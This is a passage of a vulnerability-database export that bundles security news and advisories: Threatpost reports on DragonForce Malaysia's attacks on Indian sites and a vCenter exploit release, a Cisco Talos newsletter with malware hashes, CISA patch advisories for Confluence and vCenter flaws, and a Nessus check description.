NOW**](<https://threatpost.com/webinars/4-golden-rules-linux-security/?utm_source=ART&utm_medium=ART&utm_campaign=September_Uptycs_Webinar>) and join the **LIVE event on Sept. 29 at Noon EST**. Joining Threatpost is Uptycs\u2019 Ben Montour and Rishi Kant who will spell out Linux security best practices and take your most pressing questions in real time._\n", "cvss3": {}, "published": "2021-09-28T15:06:20", "type": "threatpost", "title": "Working PoC Is Out for VMware vCenter CVE-2021-22005 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-28T15:06:20", "id": "THREATPOST:5E0AFAA7B317D1BA456F06AE1A56D0A3", "href": "https://threatpost.com/working-exploit-vmware-vcenter-cve-2021-22005/175059/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T15:52:57", "description": "According to a new [advisory](<https://www.radware.com/getattachment/bde65cb6-ace4-4dea-bce3-5f3b6cc1c951/Advisory-DragonForce-OpsPatuk-OpsIndia-final.pdf.aspx>) from Radware, a hacktivist group called DragonForce Malaysia, \u201cwith the assistance of several other threat groups, has begun indiscriminately scanning, defacing and launching denial-of-service attacks against numerous websites in India.\u201d In addition to DDoS, their targeted campaign \u2013 dubbed \u201cOpsPatuk\u201d \u2013 involves advanced threat actors \u201cleveraging current exploits, breaching networks and leaking data.\u201d\n\nDragonForce Malaysia \u2013 best known for their hacktivism in support of the Palestinian cause \u2013 have turned their attention on India this time, in response to a controversial comment made by a Hindu political spokesperson about the Prophet Mohammed.\n\nAccording to the advisory, OpsPatuk remains ongoing today.\n\n## The Casus Belli\n\nIn a televised debate last month, Nupur Sharma \u2013 a spokesperson for the Hindu nationalist Bharatiya Janata Party (BJP) \u2013 made controversial remarks regarding the age of the Prophet Mohammed\u2019s third wife, Aisha. Widespread outrage followed, involving statements from leaders in the Muslim world, widespread protests, and the outsting of Sharma herself from BJP.\n\nThen, beginning on June 10, DragonForce Malaysia entered the fray. Their new offensive against the government of India was first enshrined in a [tweet](<https://twitter.com/DragonForceIO/status/1535273727755096064?ref_src=twsrc%5Etfw>):\n\n_Greetings The Government of India. __We Are DragonForce Malaysia. __This is a special operation on the insult of our Prophet Muhammad S.A.W. __India Government website hacked by DragonForce Malaysia. We will never remain silent. __Come Join This Operation ! __#OpsPatuk Engaged_\n\n![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/103/2022/06/15094527/DragonForceIO.png)\n\n(image from @DragonForceIO on Twitter)\n\nThe new advisory confirms that the group has used DDoS to perform \u201cnumerous defacements across India,\u201d pasting their logo and messaging to targeted websites.\n\nThe group also \u201cclaimed to have breached and leaked data from various government agencies, financial institutions, universities, service providers, and several other Indian databases.\u201d\n\nThe researchers also observed other hacktivists \u2013 \u2018Localhost\u2019, \u2018M4NGTX\u2019, \u20181887\u2019, and \u2018RzkyO\u2019 \u2013 joining the party, \u201cdefacing multiple websites across India in the name of their religion.\u201d\n\n## Who are DragonForce Malaysia?\n\nDragonForce Malaysia is a hacktivist group in the vein of Anonymous. They\u2019re connected by political goals, with a penchant for sensationalism. Their social media channels and website forums \u2013 used for everything \u201cranging from running an eSports team to launching cyberattacks\u201d \u2013 are visited by tens of thousands of users.\n\nIn the past, DragonForce have launched attacks against organizations and government entities across the Middle East and Asia. Their favorite target has been Israel, having launched multiple operations \u2013 #OpsBedil, #OpsBedilReloaded and #OpsRWM \u2013 against the nation and its citizens.\n\nAccording to the authors of the advisory, DragonForce are \u201cnot considered an advanced or a persistent threat group, nor are they currently considered to be sophisticated. But where they lack sophistication, they make up for it with their organizational skills and ability to quickly disseminate information to other members.\u201d Like Anonymous and the Low Orbit Ion Cannon, DragonForce weaponizes their own open source DoS tools \u2013 Slowloris, DDoSTool, DDoS-Ripper, Hammer, and more \u2013 in choreographed, flashy website defacements.\n\nSome members, \u201cover the last year, have demonstrated the ability and desire to evolve into a highly sophisticated threat group.\u201d Among other things, that\u2019s included leveraing publicly disclosed vulnerabilities. In OpsPatuk, for example, they\u2019ve been working with the recently discovered [CVE-2022-26134](<https://threatpost.com/public-exploits-atlassian-confluence-flaw/179887/>).\n\n\u201cDragonForce Malaysia and its associates have proven their ability to adapt and evolve with the threat landscape in the last year,\u201d concluded the authors. With no signs of slowing down, \u201cRadware expects DragonForce Malaysia to continue launching new reactionary campaigns based on their social, political, and religious affiliations in the foreseeable future.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-15T13:59:37", "type": "threatpost", "title": "DragonForce Gang Unleash Hacks Against Govt. of India", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-15T13:59:37", "id": "THREATPOST:8C179A769DB315AF46676A862FC3D942", "href": "https://threatpost.com/hackers-india-government/179968/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2022-08-04T19:59:46", "description": "[![](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s16000/threat-source-newsletter.jpg)](<https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjLGV0qm1JxU91RjdxVIuHS5qpDp6eR5oqC3GXE4GKh74vcE6eErdX-odGGmldK4seEV08PmWVUMwC9eHiY-MNvEWPJqq7kEe3k9gjAfn0ai-JRQnZ3GdRiAki_wed_Ctz2-MbeTD591fAVRErXhYumK3_GFcUGqEBUmnA_aeVfgK2rZKQ7AW0eYUiY/s2000/threat-source-newsletter.jpg>)\n\n_By Jon Munshaw. _\n\n[![](https://blogger.googleusercontent.com/img/a/AVvXsEj-mJ-nkfcUqAs6gZvX8xS2acg2Gomq1k9sbhaev8z9XCZnVEc3hnBv_CAEBr5YFPKbzeHm615Hm1J6VmtXbPW-VDGf1Y6GkVCjPTnH973CDJSSnSoxB93Nru0Ohx-w8atdDxbRuYdx1wk5h-eUvHihWfJ9aTwOLINT1HzhDqTPflICljFmGplz6bX9=w114-h42)](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>)\n\nWelcome to this week\u2019s edition of the Threat Source newsletter. \n\n \n\n\nAfter what seems like forever and honestly has been a really long time, we\u2019re heading back to BlackHat in-person this year. We\u2019re excited to see a lot of old friends again to commiserate, hang out, trade stories and generally talk about security. \n\n \n\n\nThroughout the two days of the main conference, we\u2019ll have a full suite of flash talks at the Cisco Secure booth and several sponsored talks. Since this is the last edition of the newsletter before BlackHat starts, it\u2019s probably worthwhile running through all the cool stuff we\u2019ll have going on at Hacker Summer Camp. \n\n \n\n\nOur [booth should be easy enough to find](<https://www.expocad.com/host/fx/ubm/22bhusa/exfx.html>) \u2014 it\u2019s right by the main entrance to Bayside B. If you get to the Trellix Lounge, you\u2019ve gone too far north. Our researchers will be there to answer any questions you have and present on a wide variety of security topics, from research into Adobe vulnerabilities to the privacy effects of the overturn of Roe vs. Wade. Attendees who watch a lightning talk can grab a never-before-seen [Snort 3](<https://snort.org/snort3>)-themed Snorty and our malware mascot stickers, which were a [big hit at Cisco Live this year](<https://twitter.com/TalosSecurity/status/1536821931097305088>). \n\n \n\n\nWe\u2019ll also be over at the Career Center if you want to [come work with us](<https://talosintelligence.com/careers>). Or even if you don\u2019t, word on the street is there\u2019ll be silver and gold Snortys there. And on Thursday the 11th between 10 a.m. and noon local time a Talos hiring manager will be on site reviewing resumes and taking questions. \n\n \n\n\nIf you want more in-depth talks, we\u2019ll have five sponsored sessions between the 10th and 11th. If you want the latest schedule and location on those talks, be sure to [follow us on Twitter](<https://twitter.com/TalosSecurity>) or check out Cisco\u2019s BlackHat event page [here](<https://www.cisco.com/c/en/us/products/security/black-hat-usa.html>). Our sponsored talks cover Talos\u2019 latest work in Ukraine, the growing threat of business email compromise and current trends from state-sponsored actors. Make sure to catch all five of them. \n\n \n\n\nAnd if you liked our speakeasy at Cisco Live, you'll love the next secret we have in store at the BlackHat booth. Swing by and ask us about it. \n\n \n\n\nFor anyone sticking around for DEF CON, we\u2019ll also have a presence there with Blue Team Village. Drop any questions in the [Blue Team Village Discord](<https://www.blueteamvillage.org/>) for us, and be sure to attend the BTV Pool Party on Aug. 12 from 8 \u2013 11 p.m. local time. \n\n \n\n\nTo stay up to date on all things Talos at both conferences, be sure to follow us on social media. - \n\n\n \n\n## The one big thing \n\n> \n\n\nCisco Talos recently discovered [a new attack framework called \"Manjusaka\"](<https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html>) being used in the wild that could be the next evolution of Cobalt Strike \u2014 and is even advertised as so. This framework is advertised as an imitation of the Cobalt Strike framework. Although we haven't observed widespread usage of this framework in the wild, it has the potential to be adopted by threat actors all over the world. \n\n\n> ### Why do I care? \n> \n> Our researchers discovered a fully functional version of the command and control (C2), written in GoLang with a User Interface in Simplified Chinese, that\u2019s freely available and can generate new implants with custom configurations with ease. This increases the likelihood of wider adoption of this framework by malicious actors. If you\u2019re a defender of any kind, you want to stay up on the latest tools attackers are likely to use. And since Cobalt Strike is already one of the most widely used out there, it\u2019s safe to assume any evolution of it is going to draw some interest. \n> \n> ### So now what? \n> \n> Organizations must be diligent against such easily available tools and frameworks that can be misused by a variety of threat actors. In-depth defense strategies based on a risk analysis approach can deliver the best results in the prevention of this framework. Talos also released Snort rule 60275 and ClamAV signature Win.Trojan.Manjusaka-9956281-1 to detect the use of Manjusaka. \n\n> \n> \n\n## Other news of note\n\n \n\n\nEverything from convenience stores to government websites in Taiwan saw an uptick in cyber attacks this week after U.S. House Speaker Nancy Pelosi visited the country this week. She was the U.S.\u2019 highest-ranking official to visit there in more than 20 years. However, many of the attacks appeared to be from low-skilled attackers and some could even be attributed to a normal uptick in traffic from a busy news day. China could still retaliate for the visit with a cyber attack against Taiwan or the U.S., as the Chinese government has voiced its displeasure over Pelosi\u2019s actions and launched several kinetic warfare exercises. ([Reuters](<https://www.reuters.com/technology/7-11s-train-stations-cyber-attacks-plague-taiwan-over-pelosi-visit-2022-08-04/>), [Washington Post](<https://www.washingtonpost.com/politics/2022/08/03/those-pelosi-inspired-cyberattacks-taiwan-probably-werent-all-they-were-cracked-up-be/>)) \n\nThe U.S. Cybersecurity and Infrastructure Security Agency is warning that attackers are actively exploiting a critical vulnerability in Atlassian Confluence disclosed last week. CISA added CVE-2022-26138, a hardcoded password vulnerability in the Questions for Confluence app, to its list of Known Exploited Vulnerabilities on Friday. Adversaries can exploit this vulnerability to gain total access to data in on-premises Confluence Server and Confluence Data Center platforms. U.S. federal agencies have three weeks to patch for the issue under CISA\u2019s new guidance. ([Dark Reading](<https://www.darkreading.com/cloud/patch-now-atlassian-confluence-bug-active-exploit>), [Bleeping Computer](<https://www.bleepingcomputer.com/news/security/cisa-warns-of-critical-confluence-bug-exploited-in-attacks/>)) \n\nNorth Korean state-sponsored actors continue to be active, recently adding a new Gmail attack to its arsenal. The infamous SharpTongue group uses the SHARPEXT malware to target organizations in the U.S., Europe and South Korea that work on nuclear weapons and other topics that North Korea sees as relevant to its national security. SHARPEXT installs a Google Chrome extension that allows the attackers to bypass users\u2019 Gmail multi-factor authentication and passwords, eventually entering the inbox and reading and downloading email and attachments. Other North Korean actors continue to use fake LinkedIn applications to apply for remote jobs, hoping to eventually steal cryptocurrency and fund the country\u2019s weapons program. ([Ars Technica](<https://arstechnica.com/information-technology/2022/08/north-korea-backed-hackers-have-a-clever-way-to-read-your-gmail/>), [Bloomberg](<https://www.bloomberg.com/news/articles/2022-08-01/north-koreans-suspected-of-using-fake-resumes-to-steal-crypto>)) \n\n \n\n\n## Can\u2019t get enough Talos? \n\n * _[Talos Takes Ep. #106: The top attacker trends from the past quarter](<https://talosintelligence.com/podcasts/shows/talos_takes/episodes/106>)_\n * _[Beers with Talos Ep. #124: There's no such thing as \"I have nothing to hide\"](<https://talosintelligence.com/podcasts/shows/beers_with_talos/episodes/124>)_\n * _[BlackHat \u2014 A poem](<https://blog.talosintelligence.com/2022/08/poems-0xCCd.html>)_\n * _[Vulnerability Spotlight: Vulnerabilities in Alyac antivirus program could stop virus scanning, cause code execution](<https://blog.talosintelligence.com/2022/05/vuln-spotlight-alyac-est.html>)_\n * _[Vulnerability Spotlight: How misusing properly serialized data opened TCL LinkHub Mesh Wi-Fi system to 17 vulnerabilities](<https://blog.talosintelligence.com/2022/08/vulnerability-spotlight-how-misusing.html>)_\n * _[Researcher Spotlight: You should have been listening to Lurene Grenier years ago](<https://blog.talosintelligence.com/2022/08/researcher-spotlight-you-should-have.html>)_\n * _[Manjusaka, a new attack tool similar to Sliver and Cobalt Strike](<https://securityaffairs.co/wordpress/133953/hacking/manjusaka-attack-tool.html>)_\n\n \n\n\n## Upcoming events where you can find Talos \n\n#### \n\n\n[**BlackHat**](<https://www.blackhat.com/us-22/>) **U.S.A 2022 **(Aug. 6 - 11, 2022) \nLas Vegas, Nevada \n\n \n\n\n_[USENIX Security '22](<https://www.usenix.org/conference/usenixsecurity22#registration>) _**(Aug. 10 - 12, 2022)** \nLas Vegas, Nevada \n\n \n\n\n**[DEF CON U.S.](<https://defcon.org/>) **(Aug. 11 - 14, 2022) \nLas Vegas, Nevada \n\n \n\n\n**[Security Insights 101 Knowledge Series](<https://aavar.org/securityinsights101/>) (Aug. 25, 2022)**\n\nVirtual \n\n \n\n\n## Most prevalent malware files from Talos telemetry over the past week \n\n** \n**\n\n**SHA 256: **[e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934](<https://www.virustotal.com/gui/file/e4973db44081591e9bff5117946defbef6041397e56164f485cf8ec57b1d8934/details>)** \n****MD5: **93fefc3e88ffb78abb36365fa5cf857c ** \n****Typical Filename: **Wextract \n**Claimed Product: **Internet Explorer \n**Detection Name: **PUA.Win.Trojan.Generic::85.lp.ret.sbx.tg \n\n \n\n\n**SHA 256: **[125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645](<https://www.virustotal.com/gui/file/125e12c8045689bb2a5dcad6fa2644847156dec8b533ee8a3653b432f8fd5645/details>) ** **\n\n**MD5: **2c8ea737a232fd03ab80db672d50a17a \n\n**Typical Filename:** LwssPlayer.scr \n\n**Claimed Product: **\u68a6\u60f3\u4e4b\u5dc5\u5e7b\u706f\u64ad\u653e\u5668 \n\n**Detection Name: **Auto.125E12.241442.in02 \n\n \n\n\n**SHA 256:** [f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121](<https://www.virustotal.com/gui/file/f21b040f7c47d8d3d9c1f0ef00f09e69f2c3f0e19d91988efc0ddd4833ced121/details>) \n\n**MD5:** 9066dff68c1d66a6d5f9f2904359876c \n\n**Typical Filename:** dota-15_id3622928ids1s.exe \n\n**Claimed Product:** N/A \n\n**Detection Name:** W32.F21B040F7C.in12.Talos \n\n \n\n\n**SHA 256: **[e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c](<https://www.virustotal.com/gui/file/e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c/details>) ** **\n\n**MD5:** a087b2e6ec57b08c0d0750c60f96a74c \n\n**Typical Filename: **AAct.exe ** **\n\n**Claimed Product:** N/A ** **\n\n**Detection Name: **PUA.Win.Tool.Kmsauto::1201** **\n\n** \n**\n\n**SHA 256: **[168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0](<https://www.virustotal.com/gui/file/168e625c7eb51720f5ce1922aec6ad316b3aaca838bd864ee2bcdbd9b66171d0/details>) \n\n**MD5: **311d64e4892f75019ee257b8377c723e \n\n**Typical Filename: **ultrasurf-21-32.exe ** **\n\n**Claimed Product: **N/A \n\n**Detection Name: **W32.DFC.MalParent", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-04T18:00:00", "type": "talosblog", "title": "Threat Source newsletter (Aug. 4, 2022) \u2014 BlackHat 2022 preview", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-08-04T18:00:00", "id": "TALOSBLOG:1CC8B88D18FD4407B2AEF8B648A80C27", "href": "http://blog.talosintelligence.com/2022/08/threat-source-newsletter-aug-4-2022.html", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-08-05T13:56:42", "description": "Atlassian has released a security advisory to address a vulnerability (CVE-2022-26138) affecting Questions for Confluence App. An attacker could exploit this vulnerability to obtain sensitive information. Atlassian reports that the vulnerability is likely to be exploited in the wild.\n\nCISA encourages users and administrators to review Atlassian\u2019s security advisory, [Questions For Confluence Security Advisory 2022-07-20](<https://confluence.atlassian.com/doc/questions-for-confluence-security-advisory-2022-07-20-1142446709.html>), and apply the necessary updates immediately. \n\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-22T00:00:00", "type": "cisa", "title": "Atlassian Releases Security Advisory for Questions for Confluence App, CVE-2022-26138", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-26138"], "modified": "2022-07-22T00:00:00", "id": "CISA:B99FA8E68B4D7FF5BA1F6693AC9C7CCF", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/07/22/atlassian-releases-security-advisory-questions-confluence-app-cve", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-11-26T18:14:34", "description": "On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability\u2014CVE-2021-22005\u2014in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server.\n\nOn September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability.\n\nTo mitigate CVE-2021-22005, CISA strongly urges critical infrastructure entities and other organizations with affected vCenter Server versions to take the following actions.\n\n * Upgrade to a fixed version as quickly as possible. See VMware Security Advisory [VMSA-2021-0020](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) for patching information.\n * Apply the temporary workaround provided by VMware, if unable to upgrade to a fixed version immediately. See VMware\u2019s [workaround instructions for CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-07-01T13:56:33", "description": "Atlassian has released new Confluence Server and Data Center versions to address [remote code execution vulnerability CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>) affecting these products. An unauthenticated remote attacker could exploit this vulnerability to execute code remotely. Atlassian reports that there is known exploitation of this vulnerability.\n\nCISA strongly urges organizations to review [Confluence Security Advisory 2022-06-02](<https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html>) and upgrade Confluence Server and Confluence Data Center.\n\n**Note:** per [BOD 22-01 Catalog of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>), federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products AND either apply the software update to all affected instances OR remove the affected products by 5 pm ET on Monday, June 6, 2022.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T00:00:00", "type": "cisa", "title": "Atlassian Releases New Versions of Confluence Server and Data Center to Address CVE-2022-26134", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-30T00:00:00", "id": "CISA:9E73FFA29BFAFFF667AC400A87F5434E", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/03/atlassian-releases-new-versions-confluence-server-and-data-center", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-15T14:02:20", "description": "CISA has added one new vulnerability\u2014[CVE-2022-26134](<https://www.cisa.gov/uscert/ncas/current-activity/2022/06/02/atlassian-releases-security-updates-confluence-server-and-data>)\u2014to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>), based on evidence of active exploitation. These types of vulnerabilities are a frequent attack vector for malicious cyber actors and pose significant risk to the federal enterprise. Note: to view the newly added vulnerabilities in the catalog, click on the arrow on the of the \"Date Added to Catalog\" column, which will sort by descending dates. \n\nThere are currently no updates available. Atlassian is working to issue an update. Per BOD 22-01 Catalog of Known Exploited Vulnerabilities, federal agencies are required to immediately block all internet traffic to and from Atlassian\u2019s Confluence Server and Data Center products until an update is available and successfully applied.\n\n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://cisa.gov/sites/default/files/publications/Reducing_the_Significant_Risk_of_Known_Exploited_Vulnerabilities_211103.pdf>) for more information. \n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities>). \n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-02T00:00:00", "type": "cisa", "title": "CISA Adds One Known Exploited Vulnerability (CVE-2022-26134) to Catalog\u202f\u202f ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-02T00:00:00", "id": "CISA:695499EEB6D0CB5B73EEE7BCED9FD497", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/06/02/cisa-adds-one-known-exploited-vulnerability-cve-2022-26134-catalog", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-17T16:33:16", "description": "The version of Atlassian Confluence installed on the remote host is prior to < 7.4.17 / 7.13.x < 7.13.6 / 7.14.x < 7.14.3 / 7.15.x < 7.15.2 / 7.16.x < 7.16.4 / 7.17.x < 7.17.2. It is potentially affected by a hard-coded credential vulnerability if the 'Questions for Confluence' app is installed.\n\nThe Atlassian Questions For Confluence app for Confluence Server and Data Center creates a Confluence user account in the confluence-users group with the username disabledsystemuser and a hardcoded password. A remote, unauthenticated attacker with knowledge of the hardcoded password could exploit this to log into Confluence and access all content accessible to users in the confluence-users group. This user account is created when installing versions 2.7.34, 2.7.35, and 3.0.2 of the app.(CVE-2022-26138)\n\nNote that Nessus has not tested for this issue but has instead relied 